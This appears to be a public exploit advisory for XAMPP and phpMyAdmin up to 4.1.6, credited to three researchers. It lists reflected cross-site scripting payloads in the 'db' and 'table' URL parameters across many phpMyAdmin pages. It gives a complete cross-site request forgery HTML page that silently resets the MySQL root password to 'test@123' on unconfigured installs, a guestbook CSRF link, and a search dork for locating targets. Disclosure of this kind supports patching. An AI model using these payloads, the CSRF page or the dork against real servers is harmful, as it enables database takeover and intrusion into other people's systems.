[#]----------------------------------------------------------------[#] # # [x] XAMPP & phpMyAdmin <= 4.1.6 multiple vulnerabilites # [x] Author : Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188), Gurjant Singh Sadhra(@GurjantSadhra) # [x] Contact : mayank.kapoor1708@gmail.com, gurjant31@gmail.com, sujoy3188@gmail.com # [+] Download : http://www.apachefriends.org/en/xampp-windows.html # [#]----------------------------------------------------------------[#] # # [x] Exploit : # [1] phpMyAdmin is vulnerable to a cross site scripting attack. # The vulnerability exists within the phpMyAdmin module supplied by XAMPP. # # 1. Cross Site Scripting # # In the phpMyAdmin module of the XAMPP application the following urls are vulnerable to cross site scripting attacks. The "db" parameter can be passed with # { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack. The file "c:\xampp\phpMyAdmin\libraries\db_table_exists.lib.php" # checks if the "db" parameter is a valid database name or not (line 13-18). # if (empty($is_db)) { if (strlen($db)) { $is_db = @$GLOBALS['dbi']->selectDb($db); } else { $is_db = false; } # Vulnerable parameter: "db" # http://[host]/phpmyadmin/chk_rel.php?db=>"'><img src="javascript:alert(311050)">&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php # # Multiple URL's afected: http://[host]/phpmyadmin/db_printview.php http://[host]/phpmyadmin/index.php http://[host]/phpmyadmin/pmd_general.php http://[host]/phpmyadmin/prefs_manage.php http://[host]/phpmyadmin/server_collations.php http://[host]/phpmyadmin/server_databases.php http://[host]/phpmyadmin/server_engines.php http://[host]/phpmyadmin/server_export.php http://[host]/phpmyadmin/server_import.php http://[host]/phpmyadmin/server_privileges.php http://[host]/phpmyadmin/server_replication.php http://[host]/phpmyadmin/server_sql.php http://[host]/phpmyadmin/server_status.php http://[host]/phpmyadmin/server_variables.php http://[host]/phpmyadmin/sql.php http://[host]/phpmyadmin/tbl_create.php # Vulnerable parameter: "table" # # Similar to the above mentioned vulnerability, here the "table" parameter also can be submitted with { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack. # # Multiple URL's afected: http://[host]/phpmyadmin/tbl_select.php?db=information_schema&token=6026d96cfcb8993f744a00809536dc8b&goto=db_structure.php&table=>"'><img src="javascript:alert(347790)">#PMAURL-0:tbl_select.php?db=information_schema&table=>"'><img+src="javascript:alert(347790)">&server=1&target=&lang=en&collation_connection=utf8mb4_general_ci&token=529d5dba2f3dd12daf48aa38596e1708 http://[host]/phpmyadmin/tbl_structure.php # # # 2. Cross Site Request Forgery # After installing XAMPP the default password for MySQL is blank with the default user being "root". In the link "http://localhost/security/xamppsecurity.php" there is an option to change # the MySQL password for the user "root". The form that submits the new password is not authenticated with a token or any such XSRF protection. The below html page can be sent to the victim, <html> <script> document.getElementById("xampp").submit(); </script> <body onload="run_once()"> <form id="xampp" action="http://localhost/security/xamppsecurity.php" method="POST"> <input type="hidden" name="mypasswd" value="test@123" /> <input type="hidden" name="mypasswdrepeat" value="test@123" /> <input type="hidden" name="authphpmyadmin" value="cookie" /> <input type="hidden" name="changing" value="Password changing" /> <input type="hidden" name="xamppuser" value="" /> <input type="hidden" name="xampppasswd" value="" /> <input type="submit" value="Click here" /> </form> </body> </html> # thus succesfully changing the password to "test@123". This will only work if the password has never been changed since installation. # # # Another location in the XAMPP application vulnerable to Cross site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl . http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam dork: "inurl:xampp/guestbook-en.pl" [#]----------------------------------------------------------------[#] #EOF